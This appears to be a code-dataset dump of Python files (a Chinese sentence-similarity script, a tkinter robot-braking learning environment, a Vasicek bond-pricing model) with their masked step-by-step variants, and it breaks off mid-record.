\"The Decomposed Result is: \"\n print Final\n else:\n newsubs = Rec.tosptensor().subs\n tempvals = Rec.tosptensor().vals\n newfilename = file_name[:-4] + '_Recover' + file_name[-4:]\n #print \"\\n\" + \"The original Tensor is: \"\n #print Ori\n print \"\\n\" + \"The Recovered Tensor is: \"\n print Rec.data\n\n # Return result\n return Ori, full, Final, Rec\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# coding:utf-8
import jieba
import os
import sys
import math
reload(sys)
sys.setdefaultencoding('utf-8')
from sklearn import feature_extraction
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.feature_extraction.text import CountVectorizer
#import csv
#import pandas
#import numpy
sentence1 = sys.argv[1]
sentence2 = sys.argv[2]
#sentence1 = '他很喜欢玩游戏,也喜欢看小说'
#sentence2 = '他喜欢玩游戏,最喜欢看小说'
Divlist1 = jieba.lcut(sentence1, cut_all=True)
Divlist2 = jieba.lcut(sentence2, cut_all=True)
Sen = [" ".join(Divlist1), " ".join(Divlist2)]
vectorizer=CountVectorizer()#this class converts the words in the text into a term-frequency matrix
transformer=TfidfTransformer()#this class computes the tf-idf weight of every word
TFIDF_value=vectorizer.fit_transform(Sen)
word=vectorizer.get_feature_names()#get all the words in the bag-of-words model
matrix_value = TFIDF_value.toarray()
vex1 = list(matrix_value[0])
vex2 = list(matrix_value[1])
def cos_dist(a, b):
if len(a) != len(b):
return None
part_up = 0.0
a_sq = 0.0
b_sq = 0.0
for a1, b1 in zip(a,b):
part_up += a1*b1
a_sq += a1**2
b_sq += b1**2
part_down = math.sqrt(a_sq*b_sq)
if part_down == 0.0:
return None
else:
return part_up / part_down
Similarity_Cos = cos_dist(vex1, vex2) #cosine similarity
sumdot = 0.0
for iii in range(len(vex1)):
sumdot += vex1[iii] * vex2[iii]
Similarity_dot = sumdot #inner (dot) product
sum12 = 0.0
sum1 = 0.0
sum2 = 0.0
for index in range(len(vex1)):
sum12 += vex1[index] *vex2[index]
sum1 += vex1[index] ** 2
sum2 += vex2[index] ** 2
Similarity_Jaccard = sum12/(sum1 + sum2 - sum12) #Jaccard similarity
res=open("SIMresult.txt", 'w')
res.write('余弦: '+str(Similarity_Cos)+'\n内积: '+str(sumdot)+'\nJaccard系数: '+str(Similarity_Jaccard))
res.close()
print('余弦: '+str(Similarity_Cos)+' 内积: '+str(sumdot)+' Jaccard系数: '+str(Similarity_Jaccard))
#print(' ')
#print(Similarity_dot)
#print(' ')
#print(Similarity_Jaccard)
|
normal
|
{
"blob_id": "1a7e83fe9528b177246d6374ddaf2a76a0046e83",
"index": 200,
"step-1": "<mask token>\n\n\ndef cos_dist(a, b):\n if len(a) != len(b):\n return None\n part_up = 0.0\n a_sq = 0.0\n b_sq = 0.0\n for a1, b1 in zip(a, b):\n part_up += a1 * b1\n a_sq += a1 ** 2\n b_sq += b1 ** 2\n part_down = math.sqrt(a_sq * b_sq)\n if part_down == 0.0:\n return None\n else:\n return part_up / part_down\n\n\n<mask token>\n",
"step-2": "<mask token>\nreload(sys)\nsys.setdefaultencoding('utf-8')\n<mask token>\n\n\ndef cos_dist(a, b):\n if len(a) != len(b):\n return None\n part_up = 0.0\n a_sq = 0.0\n b_sq = 0.0\n for a1, b1 in zip(a, b):\n part_up += a1 * b1\n a_sq += a1 ** 2\n b_sq += b1 ** 2\n part_down = math.sqrt(a_sq * b_sq)\n if part_down == 0.0:\n return None\n else:\n return part_up / part_down\n\n\n<mask token>\nfor iii in range(len(vex1)):\n sumdot += vex1[iii] * vex2[iii]\n<mask token>\nfor index in range(len(vex1)):\n sum12 += vex1[index] * vex2[index]\n sum1 += vex1[index] ** 2\n sum2 += vex2[index] ** 2\n<mask token>\nres.write('余弦: ' + str(Similarity_Cos) + '\\n内积: ' + str(sumdot) +\n '\\nJaccard系数: ' + str(Similarity_Jaccard))\nres.close()\nprint('余弦: ' + str(Similarity_Cos) + ' 内积: ' + str(sumdot) + ' Jaccard系数: ' +\n str(Similarity_Jaccard))\n",
"step-3": "<mask token>\nreload(sys)\nsys.setdefaultencoding('utf-8')\n<mask token>\nsentence1 = sys.argv[1]\nsentence2 = sys.argv[2]\nDivlist1 = jieba.lcut(sentence1, cut_all=True)\nDivlist2 = jieba.lcut(sentence2, cut_all=True)\nSen = [' '.join(Divlist1), ' '.join(Divlist2)]\nvectorizer = CountVectorizer()\ntransformer = TfidfTransformer()\nTFIDF_value = vectorizer.fit_transform(Sen)\nword = vectorizer.get_feature_names()\nmatrix_value = TFIDF_value.toarray()\nvex1 = list(matrix_value[0])\nvex2 = list(matrix_value[1])\n\n\ndef cos_dist(a, b):\n if len(a) != len(b):\n return None\n part_up = 0.0\n a_sq = 0.0\n b_sq = 0.0\n for a1, b1 in zip(a, b):\n part_up += a1 * b1\n a_sq += a1 ** 2\n b_sq += b1 ** 2\n part_down = math.sqrt(a_sq * b_sq)\n if part_down == 0.0:\n return None\n else:\n return part_up / part_down\n\n\nSimilarity_Cos = cos_dist(vex1, vex2)\nsumdot = 0.0\nfor iii in range(len(vex1)):\n sumdot += vex1[iii] * vex2[iii]\nSimilarity_dot = sumdot\nsum12 = 0.0\nsum1 = 0.0\nsum2 = 0.0\nfor index in range(len(vex1)):\n sum12 += vex1[index] * vex2[index]\n sum1 += vex1[index] ** 2\n sum2 += vex2[index] ** 2\nSimilarity_Jaccard = sum12 / (sum1 + sum2 - sum12)\nres = open('SIMresult.txt', 'w')\nres.write('余弦: ' + str(Similarity_Cos) + '\\n内积: ' + str(sumdot) +\n '\\nJaccard系数: ' + str(Similarity_Jaccard))\nres.close()\nprint('余弦: ' + str(Similarity_Cos) + ' 内积: ' + str(sumdot) + ' Jaccard系数: ' +\n str(Similarity_Jaccard))\n",
"step-4": "import jieba\nimport os\nimport sys\nimport math\nreload(sys)\nsys.setdefaultencoding('utf-8')\nfrom sklearn import feature_extraction\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.feature_extraction.text import CountVectorizer\nsentence1 = sys.argv[1]\nsentence2 = sys.argv[2]\nDivlist1 = jieba.lcut(sentence1, cut_all=True)\nDivlist2 = jieba.lcut(sentence2, cut_all=True)\nSen = [' '.join(Divlist1), ' '.join(Divlist2)]\nvectorizer = CountVectorizer()\ntransformer = TfidfTransformer()\nTFIDF_value = vectorizer.fit_transform(Sen)\nword = vectorizer.get_feature_names()\nmatrix_value = TFIDF_value.toarray()\nvex1 = list(matrix_value[0])\nvex2 = list(matrix_value[1])\n\n\ndef cos_dist(a, b):\n if len(a) != len(b):\n return None\n part_up = 0.0\n a_sq = 0.0\n b_sq = 0.0\n for a1, b1 in zip(a, b):\n part_up += a1 * b1\n a_sq += a1 ** 2\n b_sq += b1 ** 2\n part_down = math.sqrt(a_sq * b_sq)\n if part_down == 0.0:\n return None\n else:\n return part_up / part_down\n\n\nSimilarity_Cos = cos_dist(vex1, vex2)\nsumdot = 0.0\nfor iii in range(len(vex1)):\n sumdot += vex1[iii] * vex2[iii]\nSimilarity_dot = sumdot\nsum12 = 0.0\nsum1 = 0.0\nsum2 = 0.0\nfor index in range(len(vex1)):\n sum12 += vex1[index] * vex2[index]\n sum1 += vex1[index] ** 2\n sum2 += vex2[index] ** 2\nSimilarity_Jaccard = sum12 / (sum1 + sum2 - sum12)\nres = open('SIMresult.txt', 'w')\nres.write('余弦: ' + str(Similarity_Cos) + '\\n内积: ' + str(sumdot) +\n '\\nJaccard系数: ' + str(Similarity_Jaccard))\nres.close()\nprint('余弦: ' + str(Similarity_Cos) + ' 内积: ' + str(sumdot) + ' Jaccard系数: ' +\n str(Similarity_Jaccard))\n",
"step-5": "# coding:utf-8 \nimport jieba\nimport os \nimport sys\nimport math\nreload(sys)\nsys.setdefaultencoding('utf-8')\nfrom sklearn import feature_extraction \nfrom sklearn.feature_extraction.text import TfidfTransformer \nfrom sklearn.feature_extraction.text import CountVectorizer\n#import csv\n#import pandas\n#import numpy\n\nsentence1 = sys.argv[1]\nsentence2 = sys.argv[2]\n#sentence1 = '他很喜欢玩游戏,也喜欢看小说'\n#sentence2 = '他喜欢玩游戏,最喜欢看小说'\n\nDivlist1 = jieba.lcut(sentence1, cut_all=True)\nDivlist2 = jieba.lcut(sentence2, cut_all=True)\n\nSen = [\" \".join(Divlist1), \" \".join(Divlist2)]\n\nvectorizer=CountVectorizer()#该类会将文本中的词语转换为词频矩阵\ntransformer=TfidfTransformer()#该类会统计每个词语的tf-idf权值 \n\nTFIDF_value=vectorizer.fit_transform(Sen)\nword=vectorizer.get_feature_names()#获取词袋模型中的所有词语 \nmatrix_value = TFIDF_value.toarray()\nvex1 = list(matrix_value[0])\nvex2 = list(matrix_value[1])\n\ndef cos_dist(a, b):\n if len(a) != len(b):\n return None\n part_up = 0.0\n a_sq = 0.0\n b_sq = 0.0\n for a1, b1 in zip(a,b):\n part_up += a1*b1\n a_sq += a1**2\n b_sq += b1**2\n part_down = math.sqrt(a_sq*b_sq)\n if part_down == 0.0:\n return None\n else:\n return part_up / part_down\n\nSimilarity_Cos = cos_dist(vex1, vex2) #余弦\n\nsumdot = 0.0\nfor iii in range(len(vex1)):\n sumdot += vex1[iii] * vex2[iii]\nSimilarity_dot = sumdot #内积\n\nsum12 = 0.0\nsum1 = 0.0\nsum2 = 0.0\nfor index in range(len(vex1)):\n sum12 += vex1[index] *vex2[index]\n sum1 += vex1[index] ** 2\n sum2 += vex2[index] ** 2\n\nSimilarity_Jaccard = sum12/(sum1 + sum2 - sum12) #jaccard相似度\n\nres=open(\"SIMresult.txt\", 'w')\nres.write('余弦: '+str(Similarity_Cos)+'\\n内积: '+str(sumdot)+'\\nJaccard系数: '+str(Similarity_Jaccard))\nres.close()\nprint('余弦: '+str(Similarity_Cos)+' 内积: '+str(sumdot)+' Jaccard系数: '+str(Similarity_Jaccard))\n#print(' ')\n#print(Similarity_dot)\n#print(' ')\n#print(Similarity_Jaccard)\n\n \n\n ",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import numpy as np
import tkinter as tk
import time
HEIGHT = 100
WIDTH = 800
ROBOT_START_X = 700
ROBOT_START_Y = 50
SLEEP_TIME = 0.00001
SLEEP_TIME_RESET = 0.2
class Environment(tk.Tk, object):
def __init__(self):
super(Environment, self).__init__()
self.action_space = ['g', 'b'] # go, break
self.num_actions = len(self.action_space)
self.title('Environment')
self.geometry('{0}x{1}'.format(WIDTH, HEIGHT))
self._build_environment()
def _build_environment(self):
self.canvas = tk.Canvas(self, bg='white', height=HEIGHT, width=WIDTH)
# create obstacle
obstacle_center = np.array([20, 50])
self.obstacle = self.canvas.create_rectangle(
obstacle_center[0] - 10, obstacle_center[1] - 40,
obstacle_center[0] + 10, obstacle_center[1] + 40,
fill='black'
)
# create robot
robot_center = np.array([ROBOT_START_X, ROBOT_START_Y])
self.robot = self.canvas.create_polygon([
robot_center[0] - 25, robot_center[1] + 10, robot_center[0] - 25, robot_center[1] - 10,
robot_center[0] - 15, robot_center[1] - 10, robot_center[0] - 15, robot_center[1] - 25,
robot_center[0] + 25, robot_center[1] - 25, robot_center[0] + 25, robot_center[1] + 25,
robot_center[0] - 15, robot_center[1] + 25, robot_center[0] - 15, robot_center[1] + 10
],
fill='blue'
)
# pack
self.canvas.pack()
def stop_robot(self):
# change outline to show the robot slows down
self.canvas.itemconfig(self.robot, outline='red')
# slow down robot
for i in range(50):
self.canvas.move(self.robot, -1, 0)
time.sleep(SLEEP_TIME * 10 * i)
self.render()
# change outline back again
self.canvas.itemconfig(self.robot, outline='')
self.render()
time.sleep(0.2)
def perform_action(self, action):
stopped = False
done = False
reward = 0
if action == 0: # drive
self.canvas.move(self.robot, -1, 0)
elif action == 1: # break
# if you want to speed up the process comment the next line in and the function stop_robot out
#self.canvas.move(self.robot, -50, 0) # move further because of stop distance
self.stop_robot()
stopped = True
nextState = self.canvas.coords(self.robot)
obstCoords = self.canvas.coords(self.obstacle)
dist = nextState[0] - obstCoords[2]
if stopped:
if (dist >= 15 and dist <= 40): # if enough space to obstacle
reward = 1
done = True
elif dist < 15: # if too close to obstacle
reward = -1
done = True
else: # if too far away to obstacle
reward = -1
done = False
elif nextState[0] <= obstCoords[2]: # if robot hits obstacle
reward = -1
done = True
return dist, reward, done
def reset(self):
self.update()
time.sleep(SLEEP_TIME_RESET)
self.canvas.delete(self.robot)
# create robot
robot_center = np.array([ROBOT_START_X, ROBOT_START_Y])
self.robot = self.canvas.create_polygon([
robot_center[0] - 25, robot_center[1] + 10, robot_center[0] - 25, robot_center[1] - 10,
robot_center[0] - 15, robot_center[1] - 10, robot_center[0] - 15, robot_center[1] - 25,
robot_center[0] + 25, robot_center[1] - 25, robot_center[0] + 25, robot_center[1] + 25,
robot_center[0] - 15, robot_center[1] + 25, robot_center[0] - 15, robot_center[1] + 10
],
fill='blue'
)
robotCoords = self.canvas.coords(self.robot)
obstCoords = self.canvas.coords(self.obstacle)
dist = robotCoords[0] - obstCoords[2]
return dist
def render(self):
time.sleep(SLEEP_TIME)
self.update()
|
normal
|
{
"blob_id": "ee272fe1a023d85d818a8532055dcb5dbcb6a707",
"index": 4799,
"step-1": "<mask token>\n\n\nclass Environment(tk.Tk, object):\n\n def __init__(self):\n super(Environment, self).__init__()\n self.action_space = ['g', 'b']\n self.num_actions = len(self.action_space)\n self.title('Environment')\n self.geometry('{0}x{1}'.format(WIDTH, HEIGHT))\n self._build_environment()\n <mask token>\n <mask token>\n\n def perform_action(self, action):\n stopped = False\n done = False\n reward = 0\n if action == 0:\n self.canvas.move(self.robot, -1, 0)\n elif action == 1:\n self.stop_robot()\n stopped = True\n nextState = self.canvas.coords(self.robot)\n obstCoords = self.canvas.coords(self.obstacle)\n dist = nextState[0] - obstCoords[2]\n if stopped:\n if dist >= 15 and dist <= 40:\n reward = 1\n done = True\n elif dist < 15:\n reward = -1\n done = True\n else:\n reward = -1\n done = False\n elif nextState[0] <= obstCoords[2]:\n reward = -1\n done = True\n return dist, reward, done\n\n def reset(self):\n self.update()\n time.sleep(SLEEP_TIME_RESET)\n self.canvas.delete(self.robot)\n robot_center = np.array([ROBOT_START_X, ROBOT_START_Y])\n self.robot = self.canvas.create_polygon([robot_center[0] - 25, \n robot_center[1] + 10, robot_center[0] - 25, robot_center[1] - \n 10, robot_center[0] - 15, robot_center[1] - 10, robot_center[0] -\n 15, robot_center[1] - 25, robot_center[0] + 25, robot_center[1] -\n 25, robot_center[0] + 25, robot_center[1] + 25, robot_center[0] -\n 15, robot_center[1] + 25, robot_center[0] - 15, robot_center[1] +\n 10], fill='blue')\n robotCoords = self.canvas.coords(self.robot)\n obstCoords = self.canvas.coords(self.obstacle)\n dist = robotCoords[0] - obstCoords[2]\n return dist\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Environment(tk.Tk, object):\n\n def __init__(self):\n super(Environment, self).__init__()\n self.action_space = ['g', 'b']\n self.num_actions = len(self.action_space)\n self.title('Environment')\n self.geometry('{0}x{1}'.format(WIDTH, HEIGHT))\n self._build_environment()\n\n def _build_environment(self):\n self.canvas = tk.Canvas(self, bg='white', height=HEIGHT, width=WIDTH)\n obstacle_center = np.array([20, 50])\n self.obstacle = self.canvas.create_rectangle(obstacle_center[0] - \n 10, obstacle_center[1] - 40, obstacle_center[0] + 10, \n obstacle_center[1] + 40, fill='black')\n robot_center = np.array([ROBOT_START_X, ROBOT_START_Y])\n self.robot = self.canvas.create_polygon([robot_center[0] - 25, \n robot_center[1] + 10, robot_center[0] - 25, robot_center[1] - \n 10, robot_center[0] - 15, robot_center[1] - 10, robot_center[0] -\n 15, robot_center[1] - 25, robot_center[0] + 25, robot_center[1] -\n 25, robot_center[0] + 25, robot_center[1] + 25, robot_center[0] -\n 15, robot_center[1] + 25, robot_center[0] - 15, robot_center[1] +\n 10], fill='blue')\n self.canvas.pack()\n <mask token>\n\n def perform_action(self, action):\n stopped = False\n done = False\n reward = 0\n if action == 0:\n self.canvas.move(self.robot, -1, 0)\n elif action == 1:\n self.stop_robot()\n stopped = True\n nextState = self.canvas.coords(self.robot)\n obstCoords = self.canvas.coords(self.obstacle)\n dist = nextState[0] - obstCoords[2]\n if stopped:\n if dist >= 15 and dist <= 40:\n reward = 1\n done = True\n elif dist < 15:\n reward = -1\n done = True\n else:\n reward = -1\n done = False\n elif nextState[0] <= obstCoords[2]:\n reward = -1\n done = True\n return dist, reward, done\n\n def reset(self):\n self.update()\n time.sleep(SLEEP_TIME_RESET)\n self.canvas.delete(self.robot)\n robot_center = np.array([ROBOT_START_X, ROBOT_START_Y])\n self.robot = self.canvas.create_polygon([robot_center[0] - 25, \n robot_center[1] + 10, robot_center[0] - 25, robot_center[1] - \n 10, robot_center[0] - 15, robot_center[1] - 10, robot_center[0] -\n 15, robot_center[1] - 25, robot_center[0] + 25, robot_center[1] -\n 25, robot_center[0] + 25, robot_center[1] + 25, robot_center[0] -\n 15, robot_center[1] + 25, robot_center[0] - 15, robot_center[1] +\n 10], fill='blue')\n robotCoords = self.canvas.coords(self.robot)\n obstCoords = self.canvas.coords(self.obstacle)\n dist = robotCoords[0] - obstCoords[2]\n return dist\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Environment(tk.Tk, object):\n\n def __init__(self):\n super(Environment, self).__init__()\n self.action_space = ['g', 'b']\n self.num_actions = len(self.action_space)\n self.title('Environment')\n self.geometry('{0}x{1}'.format(WIDTH, HEIGHT))\n self._build_environment()\n\n def _build_environment(self):\n self.canvas = tk.Canvas(self, bg='white', height=HEIGHT, width=WIDTH)\n obstacle_center = np.array([20, 50])\n self.obstacle = self.canvas.create_rectangle(obstacle_center[0] - \n 10, obstacle_center[1] - 40, obstacle_center[0] + 10, \n obstacle_center[1] + 40, fill='black')\n robot_center = np.array([ROBOT_START_X, ROBOT_START_Y])\n self.robot = self.canvas.create_polygon([robot_center[0] - 25, \n robot_center[1] + 10, robot_center[0] - 25, robot_center[1] - \n 10, robot_center[0] - 15, robot_center[1] - 10, robot_center[0] -\n 15, robot_center[1] - 25, robot_center[0] + 25, robot_center[1] -\n 25, robot_center[0] + 25, robot_center[1] + 25, robot_center[0] -\n 15, robot_center[1] + 25, robot_center[0] - 15, robot_center[1] +\n 10], fill='blue')\n self.canvas.pack()\n <mask token>\n\n def perform_action(self, action):\n stopped = False\n done = False\n reward = 0\n if action == 0:\n self.canvas.move(self.robot, -1, 0)\n elif action == 1:\n self.stop_robot()\n stopped = True\n nextState = self.canvas.coords(self.robot)\n obstCoords = self.canvas.coords(self.obstacle)\n dist = nextState[0] - obstCoords[2]\n if stopped:\n if dist >= 15 and dist <= 40:\n reward = 1\n done = True\n elif dist < 15:\n reward = -1\n done = True\n else:\n reward = -1\n done = False\n elif nextState[0] <= obstCoords[2]:\n reward = -1\n done = True\n return dist, reward, done\n\n def reset(self):\n self.update()\n time.sleep(SLEEP_TIME_RESET)\n self.canvas.delete(self.robot)\n robot_center = np.array([ROBOT_START_X, ROBOT_START_Y])\n self.robot = self.canvas.create_polygon([robot_center[0] - 25, \n robot_center[1] + 10, robot_center[0] - 25, robot_center[1] - \n 10, robot_center[0] - 15, robot_center[1] - 10, robot_center[0] -\n 15, robot_center[1] - 25, robot_center[0] + 25, robot_center[1] -\n 25, robot_center[0] + 25, robot_center[1] + 25, robot_center[0] -\n 15, robot_center[1] + 25, robot_center[0] - 15, robot_center[1] +\n 10], fill='blue')\n robotCoords = self.canvas.coords(self.robot)\n obstCoords = self.canvas.coords(self.obstacle)\n dist = robotCoords[0] - obstCoords[2]\n return dist\n\n def render(self):\n time.sleep(SLEEP_TIME)\n self.update()\n",
"step-4": "<mask token>\nHEIGHT = 100\nWIDTH = 800\nROBOT_START_X = 700\nROBOT_START_Y = 50\nSLEEP_TIME = 1e-05\nSLEEP_TIME_RESET = 0.2\n\n\nclass Environment(tk.Tk, object):\n\n def __init__(self):\n super(Environment, self).__init__()\n self.action_space = ['g', 'b']\n self.num_actions = len(self.action_space)\n self.title('Environment')\n self.geometry('{0}x{1}'.format(WIDTH, HEIGHT))\n self._build_environment()\n\n def _build_environment(self):\n self.canvas = tk.Canvas(self, bg='white', height=HEIGHT, width=WIDTH)\n obstacle_center = np.array([20, 50])\n self.obstacle = self.canvas.create_rectangle(obstacle_center[0] - \n 10, obstacle_center[1] - 40, obstacle_center[0] + 10, \n obstacle_center[1] + 40, fill='black')\n robot_center = np.array([ROBOT_START_X, ROBOT_START_Y])\n self.robot = self.canvas.create_polygon([robot_center[0] - 25, \n robot_center[1] + 10, robot_center[0] - 25, robot_center[1] - \n 10, robot_center[0] - 15, robot_center[1] - 10, robot_center[0] -\n 15, robot_center[1] - 25, robot_center[0] + 25, robot_center[1] -\n 25, robot_center[0] + 25, robot_center[1] + 25, robot_center[0] -\n 15, robot_center[1] + 25, robot_center[0] - 15, robot_center[1] +\n 10], fill='blue')\n self.canvas.pack()\n\n def stop_robot(self):\n self.canvas.itemconfig(self.robot, outline='red')\n for i in range(50):\n self.canvas.move(self.robot, -1, 0)\n time.sleep(SLEEP_TIME * 10 * i)\n self.render()\n self.canvas.itemconfig(self.robot, outline='')\n self.render()\n time.sleep(0.2)\n\n def perform_action(self, action):\n stopped = False\n done = False\n reward = 0\n if action == 0:\n self.canvas.move(self.robot, -1, 0)\n elif action == 1:\n self.stop_robot()\n stopped = True\n nextState = self.canvas.coords(self.robot)\n obstCoords = self.canvas.coords(self.obstacle)\n dist = nextState[0] - obstCoords[2]\n if stopped:\n if dist >= 15 and dist <= 40:\n reward = 1\n done = True\n elif dist < 15:\n reward = -1\n done = True\n else:\n reward = -1\n done = False\n elif nextState[0] <= obstCoords[2]:\n reward = -1\n done = True\n return dist, reward, done\n\n def reset(self):\n self.update()\n time.sleep(SLEEP_TIME_RESET)\n self.canvas.delete(self.robot)\n robot_center = np.array([ROBOT_START_X, ROBOT_START_Y])\n self.robot = self.canvas.create_polygon([robot_center[0] - 25, \n robot_center[1] + 10, robot_center[0] - 25, robot_center[1] - \n 10, robot_center[0] - 15, robot_center[1] - 10, robot_center[0] -\n 15, robot_center[1] - 25, robot_center[0] + 25, robot_center[1] -\n 25, robot_center[0] + 25, robot_center[1] + 25, robot_center[0] -\n 15, robot_center[1] + 25, robot_center[0] - 15, robot_center[1] +\n 10], fill='blue')\n robotCoords = self.canvas.coords(self.robot)\n obstCoords = self.canvas.coords(self.obstacle)\n dist = robotCoords[0] - obstCoords[2]\n return dist\n\n def render(self):\n time.sleep(SLEEP_TIME)\n self.update()\n",
"step-5": "import numpy as np\nimport tkinter as tk\nimport time\n\nHEIGHT = 100\nWIDTH = 800\nROBOT_START_X = 700\nROBOT_START_Y = 50\nSLEEP_TIME = 0.00001\nSLEEP_TIME_RESET = 0.2\n\nclass Environment(tk.Tk, object):\n def __init__(self):\n super(Environment, self).__init__()\n self.action_space = ['g', 'b'] # go, break\n self.num_actions = len(self.action_space)\n self.title('Environment')\n self.geometry('{0}x{1}'.format(WIDTH, HEIGHT))\n self._build_environment()\n\n def _build_environment(self):\n self.canvas = tk.Canvas(self, bg='white', height=HEIGHT, width=WIDTH)\n\n # create obstacle\n obstacle_center = np.array([20, 50])\n self.obstacle = self.canvas.create_rectangle(\n obstacle_center[0] - 10, obstacle_center[1] - 40,\n obstacle_center[0] + 10, obstacle_center[1] + 40,\n fill='black'\n )\n\n # create robot\n robot_center = np.array([ROBOT_START_X, ROBOT_START_Y])\n self.robot = self.canvas.create_polygon([\n robot_center[0] - 25, robot_center[1] + 10, robot_center[0] - 25, robot_center[1] - 10,\n robot_center[0] - 15, robot_center[1] - 10, robot_center[0] - 15, robot_center[1] - 25,\n robot_center[0] + 25, robot_center[1] - 25, robot_center[0] + 25, robot_center[1] + 25,\n robot_center[0] - 15, robot_center[1] + 25, robot_center[0] - 15, robot_center[1] + 10\n ], \n fill='blue'\n )\n\n # pack\n self.canvas.pack()\n\n def stop_robot(self):\n # change outline to show the robot slows down\n self.canvas.itemconfig(self.robot, outline='red')\n \n # slow down robot\n for i in range(50):\n self.canvas.move(self.robot, -1, 0)\n time.sleep(SLEEP_TIME * 10 * i)\n self.render()\n\n # change outline back again\n self.canvas.itemconfig(self.robot, outline='')\n self.render()\n time.sleep(0.2)\n\n def perform_action(self, action):\n stopped = False\n done = False\n reward = 0\n\n if action == 0: # drive\n self.canvas.move(self.robot, -1, 0)\n elif action == 1: # break\n # if you want to speed up the process comment the next line in and the function stop_robot out\n #self.canvas.move(self.robot, -50, 0) # move further because of stop distance\n self.stop_robot()\n stopped = True\n\n nextState = self.canvas.coords(self.robot)\n obstCoords = self.canvas.coords(self.obstacle)\n dist = nextState[0] - obstCoords[2]\n\n if stopped:\n if (dist >= 15 and dist <= 40): # if enough space to obstacle\n reward = 1\n done = True\n elif dist < 15: # if too close to obstacle\n reward = -1\n done = True\n else: # if too far away to obstacle\n reward = -1\n done = False\n elif nextState[0] <= obstCoords[2]: # if robot hits obstacle\n reward = -1\n done = True\n\n return dist, reward, done\n\n def reset(self):\n self.update()\n time.sleep(SLEEP_TIME_RESET)\n self.canvas.delete(self.robot)\n\n # create robot\n robot_center = np.array([ROBOT_START_X, ROBOT_START_Y])\n self.robot = self.canvas.create_polygon([\n robot_center[0] - 25, robot_center[1] + 10, robot_center[0] - 25, robot_center[1] - 10,\n robot_center[0] - 15, robot_center[1] - 10, robot_center[0] - 15, robot_center[1] - 25,\n robot_center[0] + 25, robot_center[1] - 25, robot_center[0] + 25, robot_center[1] + 25,\n robot_center[0] - 15, robot_center[1] + 25, robot_center[0] - 15, robot_center[1] + 10\n ], \n fill='blue'\n )\n\n robotCoords = self.canvas.coords(self.robot)\n obstCoords = self.canvas.coords(self.obstacle)\n dist = robotCoords[0] - obstCoords[2]\n\n return dist\n\n def render(self):\n time.sleep(SLEEP_TIME)\n self.update()",
"step-ids": [
4,
5,
6,
8,
10
]
}
|
[
4,
5,
6,
8,
10
] |
from functions2 import *
import numpy as np
#from functions import TermStructure,load_data
import numpy as np
import math
from scipy import optimize
import pylab as pl
from IPython import display as dp
class Vasicek():
def __init__(self,rs,vol):
self.t = rs.columns
self.ps= rs[-1:]
self.sigma = vol
def get_TheoreticalP(self,x=0):
sigma = self.sigma
try:
_ = x.shape
except:
x = self.t
a = self.a
b = self.b
B = (1-np.exp(-a*x))/a
A = np.exp(((B-x)*(a**2*b-(sigma**2)/2))/a**2-(sigma**2*B**2)/(4*a))
self.B=B
self.A=A
self.sim_p = A*np.exp(-B*x)
self.r = -1*np.log(self.sim_p)/x
return self.r
def loss(self,x):
self.a = x[0]
self.b = x[1]
self.sim_rs = apply(self.get_TheoreticalP,self.ps)
loss = np.array(self.ps.as_matrix())-np.array(self.sim_rs)
loss = 10000*np.sum(loss**2)
return loss
def solve(self,x0=np.random.rand(2)):
self.opt_results = optimize.fmin(self.loss,x0=x0)#,tol=1e-10,method='Nelder-Mead',options={'maxiter':1800})
self.a = self.opt_results[0]
self.b = self.opt_results[1]
print(self.opt_results)
def get_price_rate(self,T,r):
sigma = list(self.sigma)[T]
T = self.t[T]
a = self.a
b = self.b
B = (1-np.exp(-a*T))/a
        A = np.exp(((B-T)*(a**2*b-(sigma**2)/2))/a**2-(sigma**2*B**2)/(4*a))
p = A*np.exp(-B*r)
r = -1*np.log(p)/T
return p,r
def option_pricing(V,r,t,T,X):
#print('Expiration: {}'.format(t))
#print('Maturity: {}'.format(T))
time_dict = dict(zip(V.t,np.arange(len(V.t))))
r = r[-1:][t].item()
P = V.get_price_rate(time_dict[T],r)
p = V.get_price_rate(time_dict[t],r)
sigmap = V.sigma[t]*(1/V.a)*(1/np.sqrt(t))*(1-np.exp(-V.a*(T-t)))*np.sqrt((1-np.exp(-2*V.a*t))/(2*V.a))
d = (1/sigmap)*np.log(P[0]/(p[0]*X))+0.5*sigmap
c = P[0]*norm.cdf(d)-X*p[0]*norm.cdf(d-sigmap)
return c
|
normal
|
{
"blob_id": "b6470ffda9040223951a99abc600ce1e99fe146b",
"index": 7902,
"step-1": "<mask token>\n\n\nclass Vasicek:\n\n def __init__(self, rs, vol):\n self.t = rs.columns\n self.ps = rs[-1:]\n self.sigma = vol\n <mask token>\n\n def loss(self, x):\n self.a = x[0]\n self.b = x[1]\n self.sim_rs = apply(self.get_TheoreticalP, self.ps)\n loss = np.array(self.ps.as_matrix()) - np.array(self.sim_rs)\n loss = 10000 * np.sum(loss ** 2)\n return loss\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Vasicek:\n\n def __init__(self, rs, vol):\n self.t = rs.columns\n self.ps = rs[-1:]\n self.sigma = vol\n\n def get_TheoreticalP(self, x=0):\n sigma = self.sigma\n try:\n _ = x.shape\n except:\n x = self.t\n a = self.a\n b = self.b\n B = (1 - np.exp(-a * x)) / a\n A = np.exp((B - x) * (a ** 2 * b - sigma ** 2 / 2) / a ** 2 - sigma **\n 2 * B ** 2 / (4 * a))\n self.B = B\n self.A = A\n self.sim_p = A * np.exp(-B * x)\n self.r = -1 * np.log(self.sim_p) / x\n return self.r\n\n def loss(self, x):\n self.a = x[0]\n self.b = x[1]\n self.sim_rs = apply(self.get_TheoreticalP, self.ps)\n loss = np.array(self.ps.as_matrix()) - np.array(self.sim_rs)\n loss = 10000 * np.sum(loss ** 2)\n return loss\n\n def solve(self, x0=np.random.rand(2)):\n self.opt_results = optimize.fmin(self.loss, x0=x0)\n self.a = self.opt_results[0]\n self.b = self.opt_results[1]\n print(self.opt_results)\n <mask token>\n\n\n<mask token>\n",
